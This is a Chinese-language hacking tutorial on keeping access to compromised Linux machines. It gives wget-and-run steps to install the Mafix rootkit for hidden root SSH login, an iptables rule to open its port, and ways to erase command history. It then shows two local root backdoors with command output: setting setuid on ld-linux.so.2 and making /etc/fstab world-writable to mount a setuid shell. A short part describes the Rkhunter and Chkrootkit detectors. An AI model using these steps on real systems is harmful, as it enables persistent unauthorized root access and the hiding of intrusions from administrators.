后门
(1)开机自动反弹shell
(2)linux后门
Rookit
目前常用的有:t0rn /mafix/enyelkm 等
mafix rootkit Mafix是一款常用的轻量应用级别Rootkits,是通过伪造ssh协议漏洞实现远程登陆的特点是配置简单并可以自定义验证密码和端口号。 URL:http://forum.eviloctal.com/attachment.php?aid=13419 安装及使用: wget http://forum.eviloctal.com/attachment.php?aid=13419 tar zvxf mafix.tar.gz cd mafix chmod +x root ./root pass port 安装完成后,使用ssh 用户@IP -P 配置的端口,即可远程登录。
netstat -tnl 也验证端口是开放的。之前解压文件的目录/home/mafix在编译完后自动消失,便于隐藏。
现在就可以用root,加上新密码、端口进行登录了,即使管理员改了root的密码也可以登录。
若无法登录,检查Linux的防火墙是否关闭,或者是否把新端口加入iptables中:
iptables -A RH-Firewall-1-INPUT -m state --state NEW -m tcp -p tcp --dport 端口 -j ACCEPT
痕迹清理
清理命令记录:
(1)仅清理当前用户: history -c
(2)使系统不再保存命令记录:vi /etc/profile,找到HISTSIZE这个值,修改为0
安全检测
Rkhunter
Rkhunter的中文名叫“Rootkit猎手”, 目前可以发现大多数已知的rootkits和一些嗅探器以及后门程序. 它通过执行一系列的测试脚本来确认服务器是否已经感染rootkits. 比如检查rootkits使用的基本文件, 可执行二进制文件的错误文件权限, 检测内核模块等等。
Chkrootkit
当然如果只是用Rkhunter检查扫描还是不够权威,再来安装一款检查下吧,chkrootkit 是一款小巧易用的Unix平台上的可以检测多种rootkit入侵的工具。它的功能包括检测文件修改、utmp/wtmp/last日志修改、界面欺骗(promiscuous interfaces)、恶意核心模块(maliciouskernel modules)。
相关链接
http://www.freebuf.com/articles/network/23665.html
http://www.myhack58.com/Article/html/3/8/2011/29132.htm
http://www.tuicool.com/articles/eIv22az
http://www.jb51.net/hack/5889.html 方法一:setuid的方法,其实8是很隐蔽。看看过程: [[email protected] lib]# ls -l |grep ld-linux lrwxrwxrwx 1 root root 9 2008-06-07 17:32 ld-linux.so.2 -> ld-2.7.so lrwxrwxrwx 1 root root 13 2008-06-07 17:47 ld-lsb.so.3 -> ld-linux.so.2 [[email protected] lib]# chmod s ld-linux.so.2 [[email protected] lib]# ls -l |grep ld-2.7.so -rwsr-sr-x 1 root root 128952 2007-10-18 04:49 ld-2.7.so lrwxrwxrwx 1 root root 9 2008-06-07 17:32 ld-linux.so.2 -> ld-2.7.so [[email protected] lib]# 我们这里给/lib/ld-linux.so.2这个文件(在FC8里,它指向ld-2.7.so这个文件)加了setuid属性。然后我们看怎么利用它。 普通用户登录,测试下权限: [[email protected] ~]$ whoami xiaoyu [[email protected] ~]$ /lib/ld-linux.so.2 `which whoami` root [[email protected] ~]$ 恩,嘿嘿 root了吧,具体怎么生成root shell,你们自己去想吧,凡事都不要点得太透,对吧。呵呵,可以肯定的一点,/lib/ld-linux.so.2 /bin/sh肯定生成不了rootshell, bash检查euid 和uid,看是否相等...OK,不多说了。 方法二: 看过程: [[email protected] etc]# chmod a w /etc/fstab [[email protected] etc]# 这就留好了。此方法比较XXOXX,估计没几个管理员知道。利用方法演示下 [[email protected] ~]$ ls -l /etc/fstab -rw-rw-rw- 1 root root 456 2008-06-07 17:28 /etc/fstab [[email protected] ~]$ echo ‘test /mnt ext2 user,suid,exec,loop 0 0‘ >> /etc/fstab 然后从本机把一个文件到目标机器上去,这里我们命名为test [[email protected] tmp]$ ls -l test -rw-rw-r-- 1 xiaoyu xiaoyu 102400 2008-04-20 02:51 test [[email protected] tmp]$ mount test [[email protected] tmp]$ cd /mnt [[email protected] mnt]$ ls -l total 18 drwx------ 2 root root 12288 2008-04-20 05:44 lost found -rwsr-sr-x 1 root root 4927 2008-04-20 05:44 root [[email protected] mnt]$ ./root sh-3.2# 看到了吧,从普通用户提升到root了。呵呵。 test这个文件baidu貌似木有上传功能撒,木办法传 貌似可能有人说本地后门木啥鸟用,但是你要搞清楚:一个webshell里面就可以完成这一切....